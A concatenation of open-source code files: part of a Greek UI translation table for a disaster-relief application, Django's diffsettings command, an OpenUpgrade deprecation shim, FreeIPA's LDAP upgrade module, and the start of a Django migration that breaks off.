'Text before each Text Field (One per line)': 'Κείμενο που θα εμφανίζεται πρίν το κάθε Πεδίο Κειμένου (Ένα για κάθε γραμμή) ',
'Text': 'Κείμενο',
'The Area which this Site is located within.': 'Η ευρήτερη περιοχή όπου η συγκεκριμένη θέση βρίσκεται.',
'The Assessments module allows field workers to send in assessments.': 'Το υποππόγραμμα εκτιμήσεων επιτρέπει στους εργαζόμεους στο πεδίο να στέλνουν εκτιμήσεις.',
'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': 'Η διεύθυνση email στην οποία στέλνονται αιτήματα προς έγγριση (φυσιολογικά αυτό μπορεί να είναι ένα ομαδικό email παρά προσωπικό). Εαν το πεδίο είναι κενό τότε τα αιτήμτα εγρκίνονται αυτόματα εαν ταιριάζει το domain.',
'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': 'Το σύστημα αναφοράς συμβάντων επιτρέπει στο κοινό να αναφέρει συμβάντα και να τα παρακολουθεί.',
'The Organization this record is associated with.': 'Ο οργανισμός με τον οποίο αυτή ή εγγραφή είναι συσχετισμένη',
'The Project Tracking module allows the creation of Activities to meet Gaps in Needs Assessments.': 'Το υποπρόγραμμα Παρακολούθηση έργου επιτρέπει τη δημιουργία ενεργειών για να συμπληρώσσει τυχόν κενά στην Εκτίμηση Αναγκών',
'The Request this record is associated with.': 'Η Αίτηση αυτής της εγγραφής συνδέεται με.',
'The Unique Identifier (UUID) as assigned to this facility by the government.': 'Το μοναδικό αναγνωριστικό (UUID), όπως έχει καθοριστεί για την υποδομή από την κυβέρνηση.',
'The body height (crown to heel) in cm.': 'Ύψος Σώματος σε εκατοστά',
'The contact person for this organization.': 'Άτομο για επικοινωνία για αυτόν τον οργανισμό.',
'The entered unit links to this unit. For e.g. if you are entering m for meter then choose kilometer(if it exists) and enter the value 0.001 as multiplicator.': 'Η εισαχθήσα μονάδα συνδέει σε αυτή τη μονάδα. Για παράδειγμα εαν εισάγετε m για μέτρα, τότε επιλέξτε χιλιόμετρα (εαν υπάρχουν) και εισάγετε την τιμή 0.001 σαν πολλαπλασιαστή.',
'The first or only name of the person (mandatory).': 'Το μικρό όνομα του ατόμου (υποχρεωτικό)',
'The hospital this record is associated with.': 'Το νοσοκομείο με το οποίο αυτή η εγγραφή είναι συσχετιμσένη',
'The list of Item categories are maintained by the Administrators.': 'Αυτός ο κατάλογος κατηγοριών αντικειμένων διατηρείται από τους διαχειριστές',
'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': 'Ο αριθμός των αρχείων κοντά στον εμφανιζόμενο χάρτη για μεταφόρτωση. Το μεδέν σημαίνει ότι η πρώτη σελίδα φορτώνεται γρηγορότερα, οι μεγαλύτεροι αριθμοί σημαίνουν ότι η παραπέρα μετακίνηση του χάρτη είναι γρηγορότερη.',
'The post variable on the URL used for sending messages': 'Η μεταβλητή "post" στο URL που χρησιμοποιείται για την αποστολή μηνυμάτων',
'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'Η "απλή" (simple) πολιτική επιτρέπει σε ανώνυμους χρήστες να διαβάζουν και σε εγγεγραμμένους χρήστες να επεξεργάζονται. Η πολιτική πλήρους ασφαλείας επιτρέπει στο διαχειριστή να θέτει "αρμοδιότητες" (permissions) σε συγκεκριμένους πίνακες ή εγγραφές - δείτε models/zzz.py',
'Theme deleted': 'Θέμα διαγράφηκε',
'Theme': 'Θέμα',
'These are settings for Inbound Mail.': 'Αυτές είναι οι ρυθμίσεις για εισερχόμενη αλληογγραφία (Mail)',
'They': 'Αυτοί',
'This Group has no Members yet': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'This Team has no Members yet': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'This form allows the administrator to remove a duplicate location.': 'Αυτή η φόρμα επιτρέπει στο διαχειριστή να διαγράψει διπλή τοποθεσία.',
'This is the way to transfer data between machines as it maintains referential integrity.': 'Αυτός είναι ο τρόπος για τη μεταφορά δεδομένων μεταξύ υπολογσιτών, καθώς διατηρεί τη σχεσιακή ακαιρεαιότητα των δεδομένων',
'This might be due to a temporary overloading or maintenance of the server.': 'Αυτό μπορεί να οφείλεται σε προσωρινή υπερφόρτωση ή τη συντήρηση του server.',
'This screen allows you to upload a collection of photos to the server.': 'Αυτή η οθόνη σου επιτρέπει να μεταφορτώσεις μία συλλογή φωτογραφιών στο server.',
'Thursday': 'Πέμπτη',
'Ticket Details': 'Λεπτομέρειες "εισητηρίου"',
'Ticket added': 'Εισητήριο προστέθηκε',
'Ticket deleted': 'To εισητήριο διαγράφηκε',
'To begin the sync process, click the button on the right => ': 'Για να ξεκινήσετε τη διαδικασία συγχρονισμού πατήστε το κουμπί στα δεξιά =>',
'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in models/000_config.py': 'Για να κάνετε αλλαγές στο OpenStreetMap, πρέπει να επεξεργαστείτε το OpenStreetMap settings στο models/000_config.py',
'To variable': 'Σε μεταβλητή',
'Tornado': 'Σίφουνας',
'Total # of Target Beneficiaries': 'Συνολικός αριθμός στοχευμένων δικαιούχων',
'Total Beds': 'Συνολικά Κρεβάτια',
'Total Cost per Megabyte': 'Συνολικό Κόστος ανά Megabyte',
'Total Monthly': 'Συνολικό Μηνιαίο',
'Total Recurring Costs': 'Συνολικά κόστη Στρατολόγησης',
'Total Unit Cost: ': 'Συνολικό κόστος μονάδος: ',
'Total number of houses in the area': 'Συνολικός αριθμός κατοικιών στη περιοχή',
'Totals for Bundle:': 'Σύνολα για Πακέτο:',
'Tracing': 'Ιχνηλατώντας',
'Track uploaded': 'Διαδρομή μεταφορτώθηκε',
'Track': 'Φορτηγό',
'Tracking of basic information on the location, facilities and size of the Shelters': 'Εύρεση βασικών πληροφοριών για την περιοχή-θέση, υποδομές και μέγεθος καταφυγίων',
'Tracks the location, distibution, capacity and breakdown of victims in Shelters': 'Καταγράφει την τοποθεσία, την διανομή, την χωρητική ικακανότητα και διανομή των θυμάτων σε καταλλύματα',
'Traffic Report': 'Αναφορά κυκλοφορίας',
'Transit Status': 'Κατάσταση Μεταφόρτωσης-Διέλευσης',
'Tropical Storm': 'Τροπική καταιγίδα',
'Tropo settings updated': 'Αναθεωρήθηκαν οι ρυθμίσεις Καιρικών Συνθηκών',
'Truck': 'Φορτηγό',
'Try checking the URL for errors, maybe it was mistyped.': 'Ελέγξτε την διεύθυνση URL για τυπογραφικά σφάλματα',
'Try hitting refresh/reload button or trying the URL from the address bar again.': 'Προσπάθηστε να κάνετε ανανέωση (refresh) ή ψάξτε την URL από το παράθυροτης διεύθυνσης ξανά',
'Tuesday': 'Τρίτη',
'Type': 'Τύπος',
'UTC Offset': 'απόκλιση ώρας από την UTC',
'Unable to parse CSV file!': 'Αδύνατο να επεξεργαστώ το αρχείο CSV',
'Understaffed': 'Ανεπαρκώς στελεχωμένη',
'Unidentified': 'Μη αναγνωρισμένο',
'Unit Details': 'Λεπτομέρειες Μονάδος',
'Unit Short Code for e.g. m for meter.': 'Συντομογραφία μονάδων μέτρησης π.χ. m για μέτρο.',
'Unit added': 'Μονάδα προστέθηκε',
'Unknown': 'Άγνωστο',
'Unresolved Conflicts': 'Μη διευθυτημένες διενέξεις',
'Update Service Profile': 'Ανανέωση προφίλ υπηρεσιών',
'Update if Master': 'Αναθεώρηση εφόσον είστε κύριος',
'Update if Newer': 'Ανανέωση εαν υπάρχει καινουργιο',
'Updates': 'ενημερώσεις',
'Upload Track': 'Μεταφόρτωση ανίχνευσης(track)',
'Upload a Spreadsheet': 'Μεταφόρτωση Λογιστικού Φύλλου',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Χρησιμοποιήστε (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT για να δημιουργήσετε ποιο περίπλοκες αναζητήσεις.',
'Use default': 'Χρήση προεπιλεγμένων',
'Use these links to download data that is currently in the database.': 'Χρησιμοποιήστε τους συνδέσμους για να μεταφορτώσετε τρέχοντα δεδομένα που βρίσκονται στη βάση.',
'Use this space to add a description about the Bin Type.': 'Χρησιμοποίησε το χώρο αυτό για να περιγράψεις τον τύπο καλαθιού (bin)',
'Use this space to add a description about the warehouse/site.': 'Χρησιμοποίησε αυτό το χώρο για να προσθέσεις μία περιγραφή για τις αποθήκες / περιοχή',
'Use this space to add additional comments and notes about the Site/Warehouse.': 'Χρησιμοποίησε αυτό το χώρο για την προσθήκη επιπλέον σχολίων για την Περιοχή / Αποθήκη',
'User Profile': 'Προφίλ Χρήστη',
'User Updated': 'Χρήστης Ενημερώθηκε',
'User deleted': 'Χρήστης Διαγράφηκε',
'Username': 'Όνομα χρήστη',
'Users removed': 'Οι χρήστες αφαιρέθηκαν ',
'Users': 'χρήστες',
'Vehicle Crime': 'Εγκληματικότητα σχετική με το όχημα',
'Vehicle Types': 'Τύποι οχημάτων',
'Verified?': 'Επιβεβαιώθηκε;',
'Version': 'Έκδοση',
'View Alerts received using either Email or SMS': 'Δείτε συναγερμούς που ελήφθησαν είτε με email ή με SMS.',
'View Outbox': 'Δείτε εξερχόμενα email',
'View Requests for Aid': 'Δείτε αιτήματα για βοήθεια',
'View the hospitals on a map.': 'Δείτε τα Νοσοκομεία στο χάρτη',
'Volcanic Ash Cloud': 'Σύννεφο ηφαιστειακής τέφρας',
'Volunteer Project': 'Έργο Εθελοντών',
'Volunteer Registration': 'Εγγραφή εθελοντή',
'Votes': 'Ψήφοι',
'Warehouse Management': 'Διαχείριση Αποθήκης',
'Water gallon': 'Νερό γαλόνι',
'Way Bill(s)': 'Λογαριασμοί',
'Website': 'Ιστοχώρος',
'Weight (kg)': 'Βάρος (Χλμ)',
'Well-Known Text': 'Γνωστός τύπος κειμένου',
'Whiskers': 'Μουστάκια',
'Who usually collects water for the family?': 'Ποιός συνήθως συγκεντρώνει νερό για την οικογένεια;',
'Width': 'Πλάτος',
'Wild Fire': 'Δασική Πυρκαγιά',
'Women who are Pregnant or in Labour': 'Γυναίκες που είνια έγκυες ή εργάζονται ',
'Working hours end': 'Τέλος εργάσιμων ωρών',
'Working hours start': 'Έναρξη ωρών εργασίας (ωραρίου)',
'X-Ray': 'Ακτίνες-X',
'You can select the Draw tool (': 'Μπορείτε να επιλέξετε το εργαλείο σχεδίασης (',
'You can set the modem settings for SMS here.': 'Μπορείτε να ρυθμίσετε τις επιλογές του modem για SMS εδώ',
'You must provide a series id to proceed.': 'Πρέπει να παρέχετε αναγνωριστικό σειράς (series id) για να προχωρήσετε.',
'Your action is required. Please approve user': 'Απαιτείται ενέργειά σας. Παρακαλώ εγκρίνετε τον χρήστη',
'Your post was added successfully.': 'Το κείμενο σας (post) προστέθηκε με επιτυχία',
'Zinc roof': 'Τσίγκινη οροφή',
'act': 'ενέργεια/άρθρο',
'active': 'ενεργό',
'added': 'προστέθηκε',
'assigned': 'ορίστηκε / ανατέθηκε',
'average': 'μέσος όρος',
'black': 'μαύρο',
'blue': 'μπλέ',
'can be used to extract data from spreadsheets and put them into database tables.': 'μπορεί να χρησιμοποιηθεί για να εξάγει δεδομένα από λογιστικά φύλλα xls και να τα τοποθετήσει σε πίνακες βάσεων δεδομένων',
'cancelled': 'ματαιώθηκε',
'consider': 'εξέτασε (λάβε υπόψη)',
'daily': 'ημερίσια',
'dark': 'σκοτάδι',
'data uploaded': 'Δεδομένα μεταφορτώθηκαν',
'database %s select': 'βάσεις δεδομένων έχουν επιλεγεί',
'database': 'βάση δεδομένων',
'editor': 'Συγγραφέας - Εκδότης',
'export as csv file': 'εξαγωγή σαν αρχείο csv',
'feedback': 'ανατροφοδότηση',
'flush latrine with septic tank': 'Αποχωρητήριο με σηπτικό βόθρο',
'full': 'πλήρες',
'here': 'εδώ',
'in GPS format': 'σε μορφότυπο GPS',
'insert new': 'Εισαγωγή νέου',
'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. People can also be captured by group for efficiency and convenience.': 'είναι ένα κεντρικό online αποθετήριο πληροφοριών όλων των θυμάτων της καταστροφής και των οικογενειών, ειδικά για τα αναγνωρισμένα θύματα, τα άτομα που εκκενώνουν την περιοχή και οι μεταταστεγαστεί άνθρωποι μπορούν να αποθηκευτούν. Πληροφορίες όπως το όνομα, ηλικία, τηλέφωνο επικοινωνίας μαζί του, τον αριθμό ταυτότητάς του, χώρος προσφυγής και άλλες λεπτομέρειες μπορούν να καταγραφούν. Φωτογραφία και δακτυλικό αποτύπωμα των ατόμων μπορεί να μεταφορτωθεί στο σύστημα. Τα άτομα επίσης μπορούν να καταγραφούν κατά ομάδες για καλύτερη αποδοτικότητα / επάρκεια και ευκολία.',
'is envisioned to be composed of several sub-modules that work together to provide complex functionality for the management of relief and project items by an organization. This includes an intake system, a warehouse management system, commodity tracking, supply chain management, fleet management, procurement, financial tracking and other asset and resource management capabilities': 'το οραματιζόμαστε να αποτελείται από αρκετά υπο-προγράμαμτα τα οποία συνεργάζονται για να προσφέρουν συνδιασμένη λειτουργικότητα για την διαχείρηση υλικών ανακούφησης και έργωβ από ένα οργανισμό. Αυτό συμπεριλαμβάνει σύστημα υποδοχής αιτημάτων, σύστημα διαχείρησης αποθήκης, καταγραφή και παρακολούθηση αγαθών, διαχείριση αλυσίδας προμηθειών, διαχείρηση στόλου οχημάτων, προμηθειών, οικονομικού ελέγχου και άλλων δυνατοτήτων διαχείρησης πόρων.',
'keeps track of all incoming tickets allowing them to be categorised & routed to the appropriate place for actioning.': 'Καταγράφει και ελέγχει όλα τα εισερχόμενα "εισητήρια" επιτρέποντας την κατηγοριοποίηση και τη δρομολόγηση τους για ενέργεια',
'kilogram': 'Χιλιόγραμμο (Κιλό)',
'latrines': 'τουαλέτες',
'login': 'Σύνδεση',
'male': 'άρρεν',
'maxResolution': 'Μέγιστη Ανάλυση',
'medium<12cm': 'μέση<12 εκατοστά',
'message_id': 'id_μηνύματος',
'module helps monitoring the status of hospitals.': 'το υποπρόγραμμα βοηθάει στον έλεγχο της κατάστασης των νοσοκομείων',
'natural hazard': 'φυσική καταστροφή',
'never': 'ποτέ',
'new': 'νέο',
'none': 'κανένα',
'normal': 'κανονικό',
'not specified': 'δεν έχουν διευκρινισθεί',
'operational intent': 'επιχειρησιακή πρόθεση-σκοπός',
'pack of 10': 'συσκευασία των 10',
'people': 'άνθρωποι',
'pit latrine': 'αποχωρητήριο - τούρκικο',
'postponed': 'αναβλήθηκε',
'previous 100 rows': 'προηγούμενες 100 γραμμές',
'provides a catalogue of digital media.': 'παρέχει έναν κατάλογο των ψηφιακών μέσων.',
'record does not exist': 'η εγγραφή δεν υπάρχει',
'record id': 'ID εγγραφής',
'reports successfully imported.': 'οι αναφορές εισήχθησαν με επιτυχία',
'selected': 'επιλέχθηκαν',
'separated from family': 'Ξεχωρίστηκε από την οικογένεια',
'separated': 'διαχωρισμένα',
'shaved': 'Ξυρισμένα',
'specify': 'διευκρινίστε',
'suffered financial losses': 'έχουν υποστεί οικονομικές απώλειες',
'tall': 'Ύψος',
'to access the system': 'για πρόσβαση στο σύστημα',
'unapproved': 'μη εγκεκριμένο',
'updated': 'Ενημερώθηκε',
'updates only': 'εηνμερώσεις μόνο',
'urgent': 'επείγον',
'weekly': 'εβδομαδιαίως',
'widowed': 'σε χηρεία',
'within human habitat': 'εντός κατοικήσιμης περιοχής (habitat)',
'yes': 'Ναι',
}
| mit |
sjlehtin/django | django/core/management/commands/diffsettings.py | 33 | 3369 | from django.core.management.base import BaseCommand
def module_to_dict(module, omittable=lambda k: k.startswith('_')):
    """Return a dict mapping each kept name in *module* to ``repr(value)``.

    Names for which *omittable* returns True (by default, anything that
    starts with an underscore) are excluded from the result.
    """
    result = {}
    for name, value in vars(module).items():
        if omittable(name):
            continue
        result[name] = repr(value)
    return result
class Command(BaseCommand):
    help = """Displays differences between the current settings.py and Django's
default settings."""
    requires_system_checks = False
    def add_arguments(self, parser):
        """Register the --all, --default and --output command-line options."""
        parser.add_argument(
            '--all', action='store_true', dest='all',
            help=(
                'Display all settings, regardless of their value. In "hash" '
                'mode, default values are prefixed by "###".'
            ),
        )
        parser.add_argument(
            '--default', dest='default', metavar='MODULE', default=None,
            help=(
                "The settings module to compare the current settings against. Leave empty to "
                "compare against Django's default settings."
            ),
        )
        parser.add_argument(
            '--output', default='hash', choices=('hash', 'unified'), dest='output',
            help=(
                "Selects the output format. 'hash' mode displays each changed "
                "setting, with the settings that don't appear in the defaults "
                "followed by ###. 'unified' mode prefixes the default setting "
                "with a minus sign, followed by the changed setting prefixed "
                "with a plus sign."
            ),
        )
    def handle(self, **options):
        """Build and return the settings diff in the selected output format."""
        from django.conf import settings, Settings, global_settings
        # Because settings are imported lazily, we need to explicitly load them.
        settings._setup()
        user_settings = module_to_dict(settings._wrapped)
        default = options['default']
        default_settings = module_to_dict(Settings(default) if default else global_settings)
        # Dispatch on the output format; argparse already validated the choice.
        output_func = {
            'hash': self.output_hash,
            'unified': self.output_unified,
        }[options['output']]
        return '\n'.join(output_func(user_settings, default_settings, **options))
    def output_hash(self, user_settings, default_settings, **options):
        # Inspired by Postfix's "postconf -n".
        # Settings absent from the defaults get a trailing "###"; with
        # --all, unchanged defaults are shown prefixed by "###".
        output = []
        for key in sorted(user_settings):
            if key not in default_settings:
                output.append("%s = %s ###" % (key, user_settings[key]))
            elif user_settings[key] != default_settings[key]:
                output.append("%s = %s" % (key, user_settings[key]))
            elif options['all']:
                output.append("### %s = %s" % (key, user_settings[key]))
        return output
    def output_unified(self, user_settings, default_settings, **options):
        # Diff-style output: "-" lines carry the default value, "+" lines
        # the current value; with --all, unchanged settings are indented.
        output = []
        for key in sorted(user_settings):
            if key not in default_settings:
                output.append(self.style.SUCCESS("+ %s = %s" % (key, user_settings[key])))
            elif user_settings[key] != default_settings[key]:
                output.append(self.style.ERROR("- %s = %s" % (key, default_settings[key])))
                output.append(self.style.SUCCESS("+ %s = %s" % (key, user_settings[key])))
            elif options['all']:
                output.append("  %s = %s" % (key, user_settings[key]))
        return output
| bsd-3-clause |
sebalix/OpenUpgrade | openerp/openupgrade/openupgrade.py | 8 | 1443 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2011-2013 Therp BV (<http://therp.nl>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import warnings
# Backwards-compatibility shim: the real implementation of this module
# moved to the external ``openupgradelib`` package. Importing this module
# emits a DeprecationWarning and re-exports the new module's names.
_short_name = __name__.split(".")[-1]
warnings.warn(
    "Importing %(full_name)s is deprecated. "
    "Use from openupgradelib import %(short_name)s" % {
        'full_name': __name__,
        'short_name': _short_name,
    }, DeprecationWarning, stacklevel=2)
# Import the replacement module (e.g. "openupgradelib.openupgrade") and copy
# every attribute into this module's namespace. At module level, locals()
# is the module's global namespace, so the assignment re-exports the names.
_new_name = "openupgradelib.%s" % _short_name
_modules = __import__(_new_name, globals(), locals(), ['*'])
for _i in dir(_modules):
    locals()[_i] = getattr(_modules, _i)
| agpl-3.0 |
msimacek/freeipa | ipaserver/install/upgradeinstance.py | 2 | 11257 | # Authors: Rob Crittenden <rcritten@redhat.com>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import ldif
import os
import sys
import shutil
import random
import traceback
from ipaplatform.paths import paths
from ipaplatform import services
from ipapython.ipa_log_manager import *
from ipapython import ipaldap
from ipaserver.install import installutils
from ipaserver.install import schemaupdate
from ipaserver.install import ldapupdate
from ipaserver.install import service
DSE = 'dse.ldif'
class GetEntryFromLDIF(ldif.LDIFParser):
    """
    LDIF parser.

    To get results, method parse() must be called first, then method
    get_results() which returns the parsed entries.
    """
    def __init__(self, input_file, entries_dn=None):
        """
        Parse LDIF file.

        :param input_file: an LDIF file to be parsed
        :param entries_dn: list of DNs which will be returned. All entries
            are returned if the list is empty or None.
        """
        ldif.LDIFParser.__init__(self, input_file)
        # Copy the caller's list instead of using a shared mutable default
        # argument; None/empty means "no filter, keep every entry".
        self.entries_dn = list(entries_dn) if entries_dn else []
        self.results = {}

    def get_results(self):
        """
        Returns results in dictionary {DN: entry, ...}
        """
        return self.results

    def handle(self, dn, entry):
        # Callback invoked by LDIFParser.parse() for each record; keep only
        # the requested DNs (or everything when no filter was given).
        if self.entries_dn and dn not in self.entries_dn:
            return
        self.results[dn] = entry
class ModifyLDIF(ldif.LDIFParser):
    """
    Allows to modify LDIF file.

    Remove operations are executed before add operations.
    """
    def __init__(self, input_file, writer):
        """
        :param input_file: an LDIF
        :param writer: ldif.LDIFWriter instance where modified LDIF will
        be written
        """
        ldif.LDIFParser.__init__(self, input_file)
        self.writer = writer
        # Queued modifications, applied in handle():
        # add_dict: {dn: {attr: [values to add]}}
        self.add_dict = {}
        # remove_dict: {dn: {attr: [values to remove] or None to drop attr}}
        self.remove_dict = {}
    def add_value(self, dn, attr, value):
        """
        Add value to LDIF.

        :param dn: DN of entry (must exist)
        :param attr: attribute name
        :param value: value to be added
        """
        attr = attr.lower()
        entry = self.add_dict.setdefault(dn, {})
        attribute = entry.setdefault(attr, [])
        # avoid queueing duplicate values for the same attribute
        if value not in attribute:
            attribute.append(value)
    def remove_value(self, dn, attr, value=None):
        """
        Remove value from LDIF.

        :param dn: DN of entry
        :param attr: attribute name
        :param value: value to be removed; if value is None, the whole
            attribute will be removed
        """
        attr = attr.lower()
        entry = self.remove_dict.setdefault(dn, {})
        if entry is None:
            return
        attribute = entry.setdefault(attr, [])
        if value is None:
            # remove all values: None is the "drop whole attribute" marker
            entry[attr] = None
            return
        elif attribute is None:
            # already marked to remove all values
            return
        if value not in attribute:
            attribute.append(value)
    def handle(self, dn, entry):
        # Parser callback: apply queued removals first, then additions,
        # then write the (possibly modified) entry to the output writer.
        if dn in self.remove_dict:
            for name, value in self.remove_dict[dn].items():
                if value is None:
                    # drop the whole attribute
                    attribute = []
                else:
                    attribute = entry.setdefault(name, [])
                    attribute = [v for v in attribute if v not in value]
                entry[name] = attribute
                if not attribute:  # empty
                    del entry[name]
        if dn in self.add_dict:
            for name, value in self.add_dict[dn].items():
                attribute = entry.setdefault(name, [])
                # only append values not already present
                attribute.extend([v for v in value if v not in attribute])
        if not entry:  # empty
            return
        self.writer.unparse(dn, entry)
class IPAUpgrade(service.Service):
    """
    Update the LDAP data in an instance by turning off all network
    listeners and updating over ldapi. This way we know the server is
    quiet.
    """
    def __init__(self, realm_name, files=None, schema_files=None):
        """
        realm_name: kerberos realm name, used to determine DS instance dir
        files: list of update files to process. If none use UPDATEDIR
        schema_files: list of schema update files to process
        """
        # Random 16-hex-digit suffix so the dse.ldif backup file name is
        # unique per upgrade run (was a manual range(8) loop).
        rand = random.Random()
        ext = "".join("%02x" % rand.randint(0, 255) for _ in range(8))
        service.Service.__init__(self, "dirsrv")
        serverid = installutils.realm_to_serverid(realm_name)
        self.filename = '%s/%s' % (paths.ETC_DIRSRV_SLAPD_INSTANCE_TEMPLATE % serverid, DSE)
        self.savefilename = '%s/%s.ipa.%s' % (paths.ETC_DIRSRV_SLAPD_INSTANCE_TEMPLATE % serverid, DSE, ext)
        # Copy caller-supplied lists; avoids the shared mutable default
        # argument pitfall (original had files=[], schema_files=[]).
        self.files = list(files) if files else []
        self.modified = False
        self.serverid = serverid
        self.schema_files = list(schema_files) if schema_files else []
        self.realm = realm_name

    def __start(self):
        # Start the instance listening only on ldapi (network listeners
        # were disabled in __disable_listeners).
        services.service(self.service_name).start(self.serverid, ldapi=True)

    def __stop_instance(self):
        """Stop only the main DS instance"""
        super(IPAUpgrade, self).stop(self.serverid)

    def create_instance(self):
        """Run the whole upgrade as an ordered sequence of service steps."""
        ds_running = super(IPAUpgrade, self).is_running()
        if ds_running:
            self.step("stopping directory server", self.__stop_instance)
        self.step("saving configuration", self.__save_config)
        self.step("disabling listeners", self.__disable_listeners)
        self.step("enabling DS global lock", self.__enable_ds_global_write_lock)
        self.step("starting directory server", self.__start)
        if self.schema_files:
            self.step("updating schema", self.__update_schema)
        self.step("upgrading server", self.__upgrade)
        # Cleanup steps run even if an earlier step failed, so the original
        # dse.ldif configuration is always restored.
        self.step("stopping directory server", self.__stop_instance,
                  run_after_failure=True)
        self.step("restoring configuration", self.__restore_config,
                  run_after_failure=True)
        if ds_running:
            self.step("starting directory server", self.start)
        self.start_creation(start_message="Upgrading IPA:",
                            show_service_name=False)

    def __save_config(self):
        # Back up dse.ldif and remember the settings we are about to
        # change (port, security, global backend lock) for later restore.
        shutil.copy2(self.filename, self.savefilename)
        with open(self.filename, "rb") as in_file:
            parser = GetEntryFromLDIF(in_file, entries_dn=["cn=config"])
            parser.parse()
            try:
                config_entry = parser.get_results()["cn=config"]
            except KeyError:
                raise RuntimeError("Unable to find cn=config entry in %s" %
                                   self.filename)

            try:
                port = config_entry['nsslapd-port'][0]
            except KeyError:
                pass
            else:
                self.backup_state('nsslapd-port', port)

            try:
                security = config_entry['nsslapd-security'][0]
            except KeyError:
                pass
            else:
                self.backup_state('nsslapd-security', security)

            try:
                global_lock = config_entry['nsslapd-global-backend-lock'][0]
            except KeyError:
                pass
            else:
                self.backup_state('nsslapd-global-backend-lock', global_lock)

    def __enable_ds_global_write_lock(self):
        # Rewrite dse.ldif to turn on the global backend lock so all
        # backends are serialized during the upgrade.
        ldif_outfile = "%s.modified.out" % self.filename
        with open(ldif_outfile, "wb") as out_file:
            ldif_writer = ldif.LDIFWriter(out_file)
            with open(self.filename, "rb") as in_file:
                parser = ModifyLDIF(in_file, ldif_writer)

                parser.remove_value("cn=config", "nsslapd-global-backend-lock")
                parser.add_value("cn=config", "nsslapd-global-backend-lock",
                                 "on")
                parser.parse()

        shutil.copy2(ldif_outfile, self.filename)

    def __restore_config(self):
        # Put back the values saved in __save_config; the global backend
        # lock stays disabled unless it was explicitly enabled before.
        port = self.restore_state('nsslapd-port')
        security = self.restore_state('nsslapd-security')
        global_lock = self.restore_state('nsslapd-global-backend-lock')

        ldif_outfile = "%s.modified.out" % self.filename
        with open(ldif_outfile, "wb") as out_file:
            ldif_writer = ldif.LDIFWriter(out_file)
            with open(self.filename, "rb") as in_file:
                parser = ModifyLDIF(in_file, ldif_writer)

                if port is not None:
                    parser.remove_value("cn=config", "nsslapd-port")
                    parser.add_value("cn=config", "nsslapd-port", port)
                if security is not None:
                    parser.remove_value("cn=config", "nsslapd-security")
                    parser.add_value("cn=config", "nsslapd-security", security)

                # disable global lock by default
                parser.remove_value("cn=config", "nsslapd-global-backend-lock")
                if global_lock is not None:
                    parser.add_value("cn=config", "nsslapd-global-backend-lock",
                                     global_lock)

                parser.parse()

        shutil.copy2(ldif_outfile, self.filename)

    def __disable_listeners(self):
        # Turn off the LDAP/LDAPS network listeners and the entry-search
        # base for ldapi, so only local ldapi access remains possible.
        ldif_outfile = "%s.modified.out" % self.filename
        with open(ldif_outfile, "wb") as out_file:
            ldif_writer = ldif.LDIFWriter(out_file)
            with open(self.filename, "rb") as in_file:
                parser = ModifyLDIF(in_file, ldif_writer)

                parser.remove_value("cn=config", "nsslapd-port")
                parser.add_value("cn=config", "nsslapd-port", "0")

                parser.remove_value("cn=config", "nsslapd-security")
                parser.add_value("cn=config", "nsslapd-security", "off")

                parser.remove_value("cn=config", "nsslapd-ldapientrysearchbase")

                parser.parse()

        shutil.copy2(ldif_outfile, self.filename)

    def __update_schema(self):
        # Apply schema update files over ldapi; remember whether anything
        # actually changed.
        self.modified = schemaupdate.update_schema(
            self.schema_files,
            dm_password='', ldapi=True) or self.modified

    def __upgrade(self):
        try:
            ld = ldapupdate.LDAPUpdate(dm_password='', ldapi=True)
            if len(self.files) == 0:
                self.files = ld.get_all_files(ldapupdate.UPDATES_DIR)
            self.modified = (ld.update(self.files) or self.modified)
        except ldapupdate.BadSyntax as e:
            root_logger.error('Bad syntax in upgrade %s', e)
            raise
        except Exception as e:
            # Bad things happened, return gracefully
            root_logger.error('Upgrade failed with %s', e)
            root_logger.debug('%s', traceback.format_exc())
            raise RuntimeError(e)
| gpl-3.0 |
dburr/SchoolIdolAPI | api/migrations/0133_auto_20160621_2124.py | 3 | 1140 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
    # Auto-generated schema migration. It makes Event.japanese_name unique
    # (with an index) and switches two ModerationReport foreign keys to
    # on_delete=SET_NULL so reports survive deletion of the referenced
    # activity/user. Do not edit the operations by hand: ordering matters.
    dependencies = [
        ('api', '0132_auto_20160607_1748'),
    ]
    operations = [
        migrations.AlterField(
            model_name='event',
            name='japanese_name',
            field=models.CharField(unique=True, max_length=100, db_index=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='moderationreport',
            name='fake_activity',
